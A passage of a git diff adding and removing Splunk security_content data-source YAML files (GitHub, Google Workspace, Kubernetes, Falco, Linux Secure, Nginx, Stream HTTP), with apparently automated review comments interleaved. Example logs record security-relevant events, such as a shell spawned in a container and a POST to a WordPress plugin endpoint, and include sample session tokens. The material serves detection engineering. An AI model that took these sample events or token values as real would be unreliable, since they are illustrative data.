+- rfc2822_message_id
+- smime_content_type
+- smime_encrypt_message
+- smime_extraction_success
+- smime_packaging_success
+- smime_sign_message
+- smtp_relay_error
+- source
+- source.address
+- source.from_header_address
+- source.from_header_displayname
+- source.selector
+- source.service
+- sourcetype
+- spam_info
+- splunk_server
+- structured_policy_log_info
+- subject
+- tag
+- tag::eventtype
+- timestamp
+- upload_error_category
+example_log: '{"action_type": 10, "rfc2822_message_id": "",
"subject": "New Order DHL0000001 - Dummy email for Detection Development", "payload_size":
6733, "source": {"address": "john@external_test_email.com", "service": "gmail-for-work",
"selector": "policy", "from_header_address": "john@external_test_email.com", "from_header_displayname":
diff --git a/data_sources/github.yml b/data_sources/github.yml
new file mode 100644
index 0000000000..0b5fd01c40
--- /dev/null
+++ b/data_sources/github.yml
@@ -0,0 +1,206 @@
+name: GitHub
+id: 88aa4632-3c3e-43f6-a00a-998d71f558e3
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for GitHub
+source: github
+sourcetype: aws:firehose:json
+supported_TA:
+- name: Splunk Add-on for Github
+ url: https://splunkbase.splunk.com/app/6254
+ version: 2.2.1
+fields:
+- _time
+- action
+- host
+- index
+- linecount
+- meta
+- punct
+- source
+- sourcetype
+- splunk_server
+- timestamp
+- workflow_run.actor.avatar_url
+- workflow_run.actor.events_url
+- workflow_run.actor.followers_url
+- workflow_run.actor.following_url
+- workflow_run.actor.gists_url
+- workflow_run.actor.gravatar_id
+- workflow_run.actor.html_url
+- workflow_run.actor.id
+- workflow_run.actor.login
+- workflow_run.actor.node_id
+- workflow_run.actor.organizations_url
+- workflow_run.actor.received_events_url
+- workflow_run.actor.repos_url
+- workflow_run.actor.site_admin
+- workflow_run.actor.starred_url
+- workflow_run.actor.subscriptions_url
+- workflow_run.actor.type
+- workflow_run.actor.url
+- workflow_run.artifacts_url
+- workflow_run.cancel_url
+- workflow_run.check_suite_id
+- workflow_run.check_suite_node_id
+- workflow_run.check_suite_url
+- workflow_run.conclusion
+- workflow_run.created_at
+- workflow_run.event
+- workflow_run.head_branch
+- workflow_run.head_commit.author.email
+- workflow_run.head_commit.author.name
+- workflow_run.head_commit.committer.email
+- workflow_run.head_commit.committer.name
+- workflow_run.head_commit.id
+- workflow_run.head_commit.message
+- workflow_run.head_commit.timestamp
+- workflow_run.head_commit.tree_id
+- workflow_run.head_repository.collaborators_url
+- workflow_run.head_repository.description
+- workflow_run.head_repository.fork
+- workflow_run.head_repository.forks_url
+- workflow_run.head_repository.full_name
+- workflow_run.head_repository.hooks_url
+- workflow_run.head_repository.html_url
+- workflow_run.head_repository.id
+- workflow_run.head_repository.keys_url
+- workflow_run.head_repository.name
+- workflow_run.head_repository.node_id
+- workflow_run.head_repository.owner.avatar_url
+- workflow_run.head_repository.owner.events_url
+- workflow_run.head_repository.owner.followers_url
+- workflow_run.head_repository.owner.following_url
+- workflow_run.head_repository.owner.gists_url
+- workflow_run.head_repository.owner.gravatar_id
+- workflow_run.head_repository.owner.html_url
+- workflow_run.head_repository.owner.id
+- workflow_run.head_repository.owner.login
+- workflow_run.head_repository.owner.node_id
+- workflow_run.head_repository.owner.organizations_url
+- workflow_run.head_repository.owner.received_events_url
+- workflow_run.head_repository.owner.repos_url
+- workflow_run.head_repository.owner.site_admin
+- workflow_run.head_repository.owner.starred_url
+- workflow_run.head_repository.owner.subscriptions_url
+- workflow_run.head_repository.owner.type
+- workflow_run.head_repository.owner.url
+- workflow_run.head_repository.private
+- workflow_run.head_repository.teams_url
+- workflow_run.head_repository.url
+- workflow_run.head_sha
+- workflow_run.html_url
+- workflow_run.id
+- workflow_run.jobs_url
+- workflow_run.logs_url
+- workflow_run.name
+- workflow_run.node_id
+- workflow_run.previous_attempt_url
+- workflow_run.pull_requests{}.base.ref
+- workflow_run.pull_requests{}.base.repo.id
+- workflow_run.pull_requests{}.base.repo.name
+- workflow_run.pull_requests{}.base.repo.url
+- workflow_run.pull_requests{}.base.sha
+- workflow_run.pull_requests{}.head.ref
+- workflow_run.pull_requests{}.head.repo.id
+- workflow_run.pull_requests{}.head.repo.name
+- workflow_run.pull_requests{}.head.repo.url
+- workflow_run.pull_requests{}.head.sha
+- workflow_run.pull_requests{}.id
+- workflow_run.pull_requests{}.number
+- workflow_run.pull_requests{}.url
+- workflow_run.repository.archive_url
+- workflow_run.repository.assignees_url
+- workflow_run.repository.blobs_url
+- workflow_run.repository.branches_url
+- workflow_run.repository.collaborators_url
+- workflow_run.repository.comments_url
+- workflow_run.repository.commits_url
+- workflow_run.repository.compare_url
+- workflow_run.repository.contents_url
+- workflow_run.repository.contributors_url
+- workflow_run.repository.deployments_url
+- workflow_run.repository.description
+- workflow_run.repository.downloads_url
+- workflow_run.repository.events_url
+- workflow_run.repository.fork
+- workflow_run.repository.forks_url
+- workflow_run.repository.full_name
+- workflow_run.repository.git_commits_url
+- workflow_run.repository.git_refs_url
+- workflow_run.repository.git_tags_url
+- workflow_run.repository.hooks_url
+- workflow_run.repository.html_url
+- workflow_run.repository.id
+- workflow_run.repository.issue_comment_url
+- workflow_run.repository.issue_events_url
+- workflow_run.repository.issues_url
+- workflow_run.repository.keys_url
+- workflow_run.repository.labels_url
+- workflow_run.repository.languages_url
+- workflow_run.repository.merges_url
+- workflow_run.repository.milestones_url
+- workflow_run.repository.name
+- workflow_run.repository.node_id
+- workflow_run.repository.notifications_url
+- workflow_run.repository.owner.avatar_url
+- workflow_run.repository.owner.events_url
+- workflow_run.repository.owner.followers_url
+- workflow_run.repository.owner.following_url
+- workflow_run.repository.owner.gists_url
+- workflow_run.repository.owner.gravatar_id
+- workflow_run.repository.owner.html_url
+- workflow_run.repository.owner.id
+- workflow_run.repository.owner.login
+- workflow_run.repository.owner.node_id
+- workflow_run.repository.owner.organizations_url
+- workflow_run.repository.owner.received_events_url
+- workflow_run.repository.owner.repos_url
+- workflow_run.repository.owner.site_admin
+- workflow_run.repository.owner.starred_url
+- workflow_run.repository.owner.subscriptions_url
+- workflow_run.repository.owner.type
+- workflow_run.repository.owner.url
+- workflow_run.repository.private
+- workflow_run.repository.pulls_url
+- workflow_run.repository.releases_url
+- workflow_run.repository.stargazers_url
+- workflow_run.repository.statuses_url
+- workflow_run.repository.subscribers_url
+- workflow_run.repository.subscription_url
+- workflow_run.repository.tags_url
+- workflow_run.repository.teams_url
+- workflow_run.repository.trees_url
+- workflow_run.repository.url
+- workflow_run.rerun_url
+- workflow_run.run_attempt
+- workflow_run.run_number
+- workflow_run.run_started_at
+- workflow_run.status
+- workflow_run.triggering_actor.avatar_url
+- workflow_run.triggering_actor.events_url
+- workflow_run.triggering_actor.followers_url
+- workflow_run.triggering_actor.following_url
+- workflow_run.triggering_actor.gists_url
+- workflow_run.triggering_actor.gravatar_id
+- workflow_run.triggering_actor.html_url
+- workflow_run.triggering_actor.id
+- workflow_run.triggering_actor.login
+- workflow_run.triggering_actor.node_id
+- workflow_run.triggering_actor.organizations_url
+- workflow_run.triggering_actor.received_events_url
+- workflow_run.triggering_actor.repos_url
+- workflow_run.triggering_actor.site_admin
+- workflow_run.triggering_actor.starred_url
+- workflow_run.triggering_actor.subscriptions_url
+- workflow_run.triggering_actor.type
+- workflow_run.triggering_actor.url
+- workflow_run.updated_at
+- workflow_run.url
+- workflow_run.workflow_id
+- workflow_run.workflow_url
+example_log: '{"action":"requested","workflow_run":{"id":2088708615,"name":"auto-update","node_id":"WFR_kwLOCa00Ec58fyoH","head_branch":"mac_os_detections","head_sha":"4049334910ea3d52a917ca35aed66d11c80ed966","run_number":9504,"event":"push","status":"queued","conclusion":null,"workflow_id":4692335,"check_suite_id":5918781611,"check_suite_node_id":"CS_kwDOCa00Ec8AAAABYMlwqw","url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615","html_url":"https://github.com/splunk/security_content/actions/runs/2088708615","pull_requests":[{"url":"https://api.github.com/repos/splunk/security_content/pulls/2131","id":893091277,"number":2131,"head":{"ref":"mac_os_detections","sha":"4049334910ea3d52a917ca35aed66d11c80ed966","repo":{"id":162346001,"url":"https://api.github.com/repos/splunk/security_content","name":"security_content"}},"base":{"ref":"develop","sha":"a7d3d1dc57f9bf36fe22e470bcf518fcc2c89283","repo":{"id":162346001,"url":"https://api.github.com/repos/splunk/security_content","name":"security_content"}}}],"created_at":"2022-04-04T08:43:15Z","updated_at":"2022-04-04T08:43:15Z","actor":{"login":"jsmith","id":8362376,"node_id":"MDQ6VXNlcjgzNjIzNzY=","avatar_url":"https://avatars.githubusercontent.com/u/8362376?v=4","gravatar_id":"","url":"https://api.github.com/users/jsmith","html_url":"https://github.com/jsmith","followers_url":"https://api.github.com/users/jsmith/followers","following_url":"https://api.github.com/users/jsmith/following{/other_user}","gists_url":"https://api.github.com/users/jsmith/gists{/gist_id}","starred_url":"https://api.github.com/users/jsmith/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/jsmith/subscriptions","organizations_url":"https://api.github.com/users/jsmith/orgs","repos_url":"https://api.github.com/users/jsmith/repos","events_url":"https://api.github.com/users/jsmith/events{/privacy}","received_events_url":"https://api.github.com/users/jsmith/received_events","type":"User","site_admin"
:false},"run_attempt":1,"run_started_at":"2022-04-04T08:43:15Z","triggering_actor":{"login":"jsmith","id":8362376,"node_id":"MDQ6VXNlcjgzNjIzNzY=","avatar_url":"https://avatars.githubusercontent.com/u/8362376?v=4","gravatar_id":"","url":"https://api.github.com/users/jsmith","html_url":"https://github.com/jsmith","followers_url":"https://api.github.com/users/jsmith/followers","following_url":"https://api.github.com/users/jsmith/following{/other_user}","gists_url":"https://api.github.com/users/jsmith/gists{/gist_id}","starred_url":"https://api.github.com/users/jsmith/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/jsmith/subscriptions","organizations_url":"https://api.github.com/users/jsmith/orgs","repos_url":"https://api.github.com/users/jsmith/repos","events_url":"https://api.github.com/users/jsmith/events{/privacy}","received_events_url":"https://api.github.com/users/jsmith/received_events","type":"User","site_admin":false},"jobs_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/jobs","logs_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/logs","check_suite_url":"https://api.github.com/repos/splunk/security_content/check-suites/5918781611","artifacts_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/artifacts","cancel_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/cancel","rerun_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/rerun","previous_attempt_url":null,"workflow_url":"https://api.github.com/repos/splunk/security_content/actions/workflows/4692335","head_commit":{"id":"4049334910ea3d52a917ca35aed66d11c80ed966","tree_id":"df4ddc1359be3b19f093b7a27dbf5708187743a0","message":"small
+ change","timestamp":"2022-04-04T08:43:01Z","author":{"name":"jsmith","email":"jsmith@evilcorp.com"},"committer":{"name":"jsmith","email":"jsmith@evilcorp.com"}},"repository":{"id":162346001,"node_id":"MDEwOlJlcG9zaXRvcnkxNjIzNDYwMDE=","name":"security_content","full_name":"splunk/security_content","private":false,"owner":{"login":"splunk","id":651467,"node_id":"MDEyOk9yZ2FuaXphdGlvbjY1MTQ2Nw==","avatar_url":"https://avatars.githubusercontent.com/u/651467?v=4","gravatar_id":"","url":"https://api.github.com/users/splunk","html_url":"https://github.com/splunk","followers_url":"https://api.github.com/users/splunk/followers","following_url":"https://api.github.com/users/splunk/following{/other_user}","gists_url":"https://api.github.com/users/splunk/gists{/gist_id}","starred_url":"https://api.github.com/users/splunk/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/splunk/subscriptions","organizations_url":"https://api.github.com/users/splunk/orgs","repos_url":"https://api.github.com/users/splunk/repos","events_url":"https://api.github.com/users/splunk/events{/privacy}","received_events_url":"https://api.github.com/users/splunk/received_events","type":"Organization","site_admin":false},"html_url":"https://github.com/splunk/security_content","description":"Splunk
+ Security Content","fork":false,"url":"https://api.github.com/repos/splunk/security_content","forks_url":"https://api.github.com/repos/splunk/security_content/forks","keys_url":"https://api.github.com/repos/splunk/security_content/keys{/key_id}","collaborators_url":"https://api.github.com/repos/splunk/security_content/collaborators{/collaborator}","teams_url":"https://api.github.com/repos/splunk/security_content/teams","hooks_url":"https://api.github.com/repos/splunk/security_content/hooks","issue_events_url":"https://api.github.com/repos/splunk/security_content/issues/events{/number}","events_url":"https://api.github.com/repos/splunk/security_content/events","assignees_url":"https://api.github.com/repos/splunk/security_content/assignees{/user}","branches_url":"https://api.github.com/repos/splunk/security_content/branches{/branch}","tags_url":"https://api.github.com/repos/splunk/security_content/tags","blobs_url":"https://api.github.com/repos/splunk/security_content/git/blobs{/sha}","git_tags_url":"https://api.github.com/repos/splunk/security_content/git/tags{/sha}","git_refs_url":"https://api.github.com/repos/splunk/security_content/git/refs{/sha}","trees_url":"https://api.github.com/repos/splunk/security_content/git/trees{/sha}","statuses_url":"https://api.github.com/repos/splunk/security_content/statuses/{sha}","languages_url":"https://api.github.com/repos/splunk/security_content/languages","stargazers_url":"https://api.github.com/repos/splunk/security_content/stargazers","contributors_url":"https://api.github.com/repos/splunk/security_content/contributors","subscribers_url":"https://api.github.com/repos/splunk/security_content/subscribers","subscription_url":"https://api.github.com/repos/splunk/security_content/subscription","commits_url":"https://api.github.com/repos/splunk/security_content/commits{/sha}","git_commits_url":"https://api.github.com/repos/splunk/security_content/git/commits{/sha}","comments_url":"https://api.github.com/repos/splunk/security_conte
nt/comments{/number}","issue_comment_url":"https://api.github.com/repos/splunk/security_content/issues/comments{/number}","contents_url":"https://api.github.com/repos/splunk/security_content/contents/{+path}","compare_url":"https://api.github.com/repos/splunk/security_content/compare/{base}...{head}","merges_url":"https://api.github.com/repos/splunk/security_content/merges","archive_url":"https://api.github.com/repos/splunk/security_content/{archive_format}{/ref}","downloads_url":"https://api.github.com/repos/splunk/security_content/downloads","issues_url":"https://api.github.com/repos/splunk/security_content/issues{/number}","pulls_url":"https://api.github.com/repos/splunk/security_content/pulls{/number}","milestones_url":"https://api.github.com/repos/splunk/security_content/milestones{/number}","notifications_url":"https://api.github.com/repos/splunk/security_content/notifications{?since,all,participating}","labels_url":"https://api.github.com/repos/splunk/security_content/labels{/name}","releases_url":"https://api.github.com/repos/splunk/security_content/releases{/id}","deployments_url":"https://api.github.com/repos/splunk/security_content/deployments"},"head_repository":{"id":162346001,"node_id":"MDEwOlJlcG9zaXRvcnkxNjIzNDYwMDE=","name":"security_content","full_name":"splunk/security_content","private":false,"owner":{"login":"splunk","id":651467,"node_id":"MDEyOk9yZ2FuaXphdGlvbjY1MTQ2Nw==","avatar_url":"https://avatars.githubusercontent.com/u/651467?v=4","gravatar_id":"","url":"https://api.github.com/users/splunk","html_url":"https://github.com/splunk","followers_url":"https://api.github.com/users/splunk/followers","following_url":"https://api.github.com/users/splunk/following{/other_user}","gists_url":"https://api.github.com/users/splunk/gists{/gist_id}","starred_url":"https://api.github.com/users/splunk/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/splunk/subscriptions","organizations_url":"https://api.github.com/users/splunk/orgs",
"repos_url":"https://api.github.com/users/splunk/repos","events_url":"https://api.github.com/users/splunk/events{/privacy}","received_events_url":"https://api.github.com/users/splunk/received_events","type":"Organization","site_admin":false},"html_url":"https://github.com/splunk/security_content","description":"Splunk
+ Security Content","fork":false,"url":"https://api.github.com/repos/splunk/security_content","forks_url":"https://api.github.com/repos/splunk/security_content/forks","keys_url":"https://api.github.com/repos/splunk/security_content/keys{/key_id}","collaborators_url":"https://api.github.com/repos/splunk/security_content/collaborators{/collaborator}","teams_url":"https://api.github.com/repos/splunk/security_content/teams","hooks_url":"https://api.github.com/repos/splunk/security_content/hooks","issue_events_url":"https://api.github.com/repos/splunk/security_content/issues/events{/num'
diff --git a/data_sources/google_workspace_login_failure.yml b/data_sources/google_workspace_login_failure.yml
new file mode 100644
index 0000000000..575f5de469
--- /dev/null
+++ b/data_sources/google_workspace_login_failure.yml
@@ -0,0 +1,56 @@
+name: Google Workspace login_failure
+id: cabec7cf-4008-4899-b47e-39c34a9a1255
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Google Workspace login_failure
+source: gws:reports:admin
+sourcetype: gws:reports:admin
+separator: event.name
+supported_TA:
+- name: Splunk Add-on for Google Workspace
+ url: https://splunkbase.splunk.com/app/5556
+ version: 2.6.3
+fields:
+- _time
+- actor.email
+- actor.profileId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- etag
+- event.name
+- event.parameters{}.multiValue{}
+- event.parameters{}.name
+- event.parameters{}.value
+- event.type
+- eventtype
+- host
+- id.applicationName
+- id.customerId
+- id.time
+- id.uniqueQualifier
+- index
+- ipAddress
+- kind
+- linecount
+- punct
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+example_log: '{"kind": "admin#reports#activity", "id": {"time": "2022-10-12T01:05:35.119Z",
+ "uniqueQualifier": "720229394436", "applicationName": "login", "customerId": "C046r85ir"},
+ "etag": "\"JCPRxFaiNR1s5TJ6ecIH8OpGdY4efiOYXbIB65itOzY/_lixtTooT11WXorGf6w6ElN0m0g\"",
+ "actor": {"email": "user29@daftpunk.com", "profileId": "114679690119024644513"},
+ "ipAddress": "141.254.89.27", "event": {"type": "login", "name": "login_failure",
+ "parameters": [{"name": "login_type", "value": "unknown"}, {"name": "login_challenge_method",
+ "multiValue": ["password"]}]}}'
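Review bot: The example_log on L24074–L24080 carries what look like non-reserved values — a public address `141.254.89.27`, a real-looking domain in `user29@daftpunk.com` and a customer ID — whereas the nginx_access sample in this same change uses documentation values (`192.0.2.1`, `198.51.100.1`, `www.example.com`). Since example_log is illustrative only, the sample would be safer to publish with the same RFC 5737 / example.com conventions, e.g. `"ipAddress": "192.0.2.10"` and `"email": "user29@example.com"`. The same applies to the kubernetes_audit sample (`176.95.188.101` and the account number embedded in `user.uid`) and to the o365 samples (`40.124.84.4`, `18.159.234.121:30395`).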
diff --git a/data_sources/google_workspace_login_success.yml b/data_sources/google_workspace_login_success.yml
new file mode 100644
index 0000000000..7a7d7f42f3
--- /dev/null
+++ b/data_sources/google_workspace_login_success.yml
@@ -0,0 +1,55 @@
+name: Google Workspace login_success
+id: bffe8013-9cdf-4fe6-9c1b-6784391a4951
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Google Workspace login_success
+source: gws:reports:admin
+sourcetype: gws:reports:admin
+separator: event.name
+supported_TA:
+- name: Splunk Add-on for Google Workspace
+ url: https://splunkbase.splunk.com/app/5556
+ version: 2.6.3
+fields:
+- _time
+- actor.email
+- actor.profileId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- etag
+- event.name
+- event.parameters{}.boolValue
+- event.parameters{}.multiValue{}
+- event.parameters{}.name
+- event.parameters{}.value
+- event.type
+- host
+- id.applicationName
+- id.customerId
+- id.time
+- id.uniqueQualifier
+- index
+- ipAddress
+- kind
+- linecount
+- punct
+- source
+- sourcetype
+- splunk_server
+- timeendpos
+- timestartpos
+example_log: '{"kind": "admin#reports#activity", "id": {"time": "2022-10-13T20:57:35.833Z",
+ "uniqueQualifier": "437744618349", "applicationName": "login", "customerId": "C046r85ir"},
+ "etag": "\"JCPRxFaiNR1s5TJ6ecIH8OpGdY4efiOYXbIB65itOzY/OgAbD-Tz8hSD1vUJWw7NLiJ5SF4\"",
+ "actor": {"email": "user1@splunkresearch.com", "profileId": "112184723778873345717"},
+ "ipAddress": "45.23.129.123", "event": {"type": "login", "name": "login_success",
+ "parameters": [{"name": "login_type", "value": "google_password"}, {"name": "login_challenge_method",
+ "multiValue": ["password", "password", "password", "password", "password"]}, {"name":
+ "is_suspicious", "boolValue": false}]}}'
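Review bot: The fields list for login_success omits `eventtype`, `tag` and `tag::eventtype`, which the sibling login_failure object lists at L24056 and L24070–L24071, although both objects describe the same `gws:reports:admin` sourcetype. If contentctl checks a detection's field references against this list, a search that filters on `tag` or `eventtype` would validate against login_failure but not against login_success. Either add the three entries here or drop them from login_failure so the two objects agree; I cannot tell from the diff which the loader expects.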
diff --git a/data_sources/kubernetes_audit.yml b/data_sources/kubernetes_audit.yml
new file mode 100644
index 0000000000..acc709438e
--- /dev/null
+++ b/data_sources/kubernetes_audit.yml
@@ -0,0 +1,63 @@
+name: Kubernetes Audit
+id: 6c25181a-0c07-4aaf-90e6-77ab1f0e6699
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Kubernetes Audit
+source: kubernetes
+sourcetype: _json
+supported_TA:
+- {}
+fields:
+- _time
+- annotations.authorization.k8s.io/decision
+- annotations.authorization.k8s.io/reason
+- apiVersion
+- auditID
+- eventtype
+- host
+- index
+- kind
+- level
+- linecount
+- objectRef.apiGroup
+- objectRef.apiVersion
+- objectRef.namespace
+- objectRef.resource
+- punct
+- requestReceivedTimestamp
+- requestURI
+- responseObject.apiVersion
+- responseObject.code
+- responseObject.details.group
+- responseObject.details.kind
+- responseObject.kind
+- responseObject.message
+- responseObject.reason
+- responseObject.status
+- responseStatus.code
+- responseStatus.details.group
+- responseStatus.details.kind
+- responseStatus.message
+- responseStatus.reason
+- responseStatus.status
+- source
+- sourceIPs{}
+- sourcetype
+- splunk_server
+- stage
+- stageTimestamp
+- tag
+- tag::eventtype
+- timestamp
+- user.groups{}
+- user.uid
+- user.username
+- userAgent
+- verb
+example_log: '{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"RequestResponse","auditID":"582c31ab-4906-49bb-9ff9-872f980ccb84","stage":"ResponseComplete","requestURI":"/apis/batch/v1/namespaces/test2/jobs?fieldManager=kubectl-create\u0026fieldValidation=Strict","verb":"create","user":{"username":"k8s-test-user","uid":"aws-iam-authenticator:591511147606:AROAYTOGP2RLFHNBOTP5J","groups":["system:authenticated"]},"sourceIPs":["176.95.188.101"],"userAgent":"kubectl/v1.27.2
+ (darwin/arm64) kubernetes/7f6f68f","objectRef":{"resource":"jobs","namespace":"test2","apiGroup":"batch","apiVersion":"v1"},"responseStatus":{"metadata":{},"status":"Failure","message":"jobs.batch
+ is forbidden: User \"k8s-test-user\" cannot create resource \"jobs\" in API group
+ \"batch\" in the namespace \"test2\"","reason":"Forbidden","details":{"group":"batch","kind":"jobs"},"code":403},"responseObject":{"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"jobs.batch
+ is forbidden: User \"k8s-test-user\" cannot create resource \"jobs\" in API group
+ \"batch\" in the namespace \"test2\"","reason":"Forbidden","details":{"group":"batch","kind":"jobs"},"code":403},"requestReceivedTimestamp":"2023-12-07T14:44:53.358394Z","stageTimestamp":"2023-12-07T14:44:53.375985Z","annotations":{"authorization.k8s.io/decision":"forbid","authorization.k8s.io/reason":""}}'
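Review bot: `supported_TA:` on L24156–L24157 is a one-element list whose only item is an empty mapping, which is a different value from "no add-on": a schema that types the list items as TA objects (`name`/`url`/`version`, as on L24035–L24037 of the Google Workspace file) will either reject `{}` or render a nameless add-on. `supported_TA: []` is the conventional way to write an empty sequence and states the intent unambiguously. The same pattern appears in kubernetes_falco (L24226), linux_secure (L24285–L24286) and nginx_access (L24555). Separately, `sourcetype: _json` is Splunk's generic pretrained JSON sourcetype, so this object does not by itself distinguish Kubernetes audit events from any other JSON input; a sentence in `description` saying that audit logs are expected to arrive with `source: kubernetes` would help detection authors.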
diff --git a/data_sources/kubernetes_falco.yml b/data_sources/kubernetes_falco.yml
new file mode 100644
index 0000000000..731a1915c8
--- /dev/null
+++ b/data_sources/kubernetes_falco.yml
@@ -0,0 +1,50 @@
+name: Kubernetes Falco
+id: 23c0eeed-840a-4711-a41b-6819c1ffbba5
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Kubernetes Falco
+source: kubernetes
+sourcetype: kube:container:falco
+supported_TA:
+- {}
+fields:
+- _time
+- command
+- container_id
+- container_image
+- container_image_tag
+- container_name
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- evt_type
+- exe_flags
+- host
+- index
+- k8s_ns
+- k8s_pod_name
+- linecount
+- parent
+- proc_exepath
+- process
+- punct
+- source
+- sourcetype
+- splunk_server
+- terminal
+- timeendpos
+- timestartpos
+- user
+- user_loginuid
+- user_uid
+example_log: '12:18:18.691725165: Notice A shell was spawned in a container with an
+ attached terminal (evt_type=execve user=root user_uid=0 user_loginuid=-1 process=bash
+ proc_exepath=/usr/lib/splunk-otel-collector/agent-bundle/bin/bash parent=runc command=bash
+ -il terminal=34816 exe_flags=EXE_WRITABLE container_id=7a2566e8e462 container_image=quay.io/signalfx/splunk-otel-collector
+ container_image_tag=0.88.0 container_name=otel-collector k8s_ns=default k8s_pod_name=my-splunk-otel-collector-agent-9sdhr)'
diff --git a/data_sources/endpoint/Linux_Secure.yml b/data_sources/linux_secure.yml
similarity index 87%
rename from data_sources/endpoint/Linux_Secure.yml
rename to data_sources/linux_secure.yml
index 3fc0cf8b13..03bdd2458e 100644
--- a/data_sources/endpoint/Linux_Secure.yml
+++ b/data_sources/linux_secure.yml
@@ -1,10 +1,13 @@
name: Linux Secure
id: 9a47d88b-1b17-49ce-a0ef-b440ddbd98bb
+version: 1
+date: '2024-07-18'
author: Patrick Bareiss, Splunk
+description: Data source object for Linux Secure
source: /var/log/secure
sourcetype: linux_secure
-supported_TA: {}
-event_names: []
+supported_TA:
+- {}
fields:
- _time
- action
diff --git a/data_sources/network/Nginx_Access.yml b/data_sources/network/Nginx_Access.yml
deleted file mode 100644
index 55424506f6..0000000000
--- a/data_sources/network/Nginx_Access.yml
+++ /dev/null
@@ -1,75 +0,0 @@
-name: Nginx Access
-id: c716a418-eab3-4df5-9dff-5420174e3068
-author: Patrick Bareiss, Splunk
-source: /var/log/nginx/access.log
-sourcetype: nginx:plus:kv
-supported_TA: {}
-event_names: []
-fields:
- - _time
- - action
- - app
- - bytes
- - bytes_in
- - bytes_out
- - category
- - date_hour
- - date_mday
- - date_minute
- - date_month
- - date_second
- - date_wday
- - date_year
- - date_zone
- - dest
- - dest_ip
- - dest_port
- - eventtype
- - host
- - http_content_type
- - http_method
- - http_referer
- - http_user_agent
- - http_user_agent_length
- - http_x_forwarded_for
- - http_x_header
- - https
- - index
- - linecount
- - nginx_version
- - product
- - protocol
- - punct
- - request_time
- - response_time
- - server
- - site
- - source
- - sourcetype
- - splunk_server
- - src
- - src_ip
- - status
- - status_description
- - status_type
- - tag
- - tag::eventtype
- - time_local
- - timeendpos
- - timestartpos
- - uri_path
- - url
- - url_domain
- - url_length
- - vendor
- - vendor_product
- - version
- - web_server
-example_log:
- site="www.example.com" server="www.example.com" dest_port="443" dest_ip="192.0.2.1"
- src="198.51.100.1" src_ip="198.51.100.1" user="-" time_local="22/Feb/2024:13:00:00
- -0500" protocol="HTTP/1.1" status="200" bytes_out="1073741000" bytes_in="234" http_referer="-"
- http_user_agent="python-requests/2.25.1" nginx_version="1.18.0" http_x_forwarded_for="-"
- http_x_header="-" uri_query="-" uri_path="/wp-json/bricks/v1/render_element" http_method="POST"
- response_time="0.250" cookie="-" request_time="0.650" category="application/json"
- https="on"
diff --git a/data_sources/network/Splunk_Stream_HTTP.yml b/data_sources/network/Splunk_Stream_HTTP.yml
deleted file mode 100644
index 06a510248e..0000000000
--- a/data_sources/network/Splunk_Stream_HTTP.yml
+++ /dev/null
@@ -1,63 +0,0 @@
-name: Splunk Stream HTTP
-id: b12f601c-7f66-4d31-ab3c-a9ab03a597d5
-author: Patrick Bareiss, Splunk
-source: stream
-sourcetype: stream:http
-supported_TA:
- name: Splunk App for Stream
- version: 8.1.1
- url: https://splunkbase.splunk.com/app/1809
-event_names: []
-fields:
- - _time
- - bytes
- - bytes_in
- - bytes_out
- - cookie
- - date_hour
- - date_mday
- - date_minute
- - date_month
- - date_second
- - date_wday
- - date_year
- - date_zone
- - dest_ip
- - dest_mac
- - dest_port
- - endtime
- - flow_id
- - form_data
- - host
- - http_comment
- - http_content_length
- - http_content_type
- - http_method
- - http_user_agent
- - index
- - linecount
- - protocol_stack
- - punct
- - request
- - server
- - site
- - source
- - sourcetype
- - splunk_server
- - src_ip
- - src_mac
- - src_port
- - status
- - time_taken
- - timeendpos
- - timestamp
- - timestartpos
- - transport
- - uri_path
-example_log:
- '{"endtime":"2021-04-21T08:12:01.084527Z","timestamp":"2021-04-21T08:12:01.082573Z","bytes":1674,"bytes_in":914,"bytes_out":760,"cookie":"session_id_8000=81beacd6cc82670cf51f101406b6f2e6dc00c023;
- splunkweb_csrf_token_8000=13513429838815417873; splunkd_8000=K_rZQa3n41JuL47HXxuyhPs6Uyg8ERiczX9k1NeOAcgeh5ujYRYXTZsScYZFpzbKV4a8q62CvlhCbXYeAHI6vhsEyaR4vE9Rzdq7Mt25A4QrsqooUEcqB_u5bptLgvpr^z1FCN","dest_ip":"10.0.1.12","dest_mac":"02:DA:73:7B:81:70","dest_port":8000,"flow_id":"b18ec342-0a3b-4fb6-b91e-a7b576687fd7","form_data":"output_mode=json&action=touch","http_comment":"HTTP/1.1
- 200 OK","http_content_length":59,"http_content_type":"application/json; charset=UTF-8","http_method":"POST","http_user_agent":"Mozilla/5.0
- (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128
- Safari/537.36","protocol_stack":"ip:tcp:http","request":"POST /en-GB/splunkd/__raw/servicesNS/nobody/search/search/jobs/1618989993.8/control
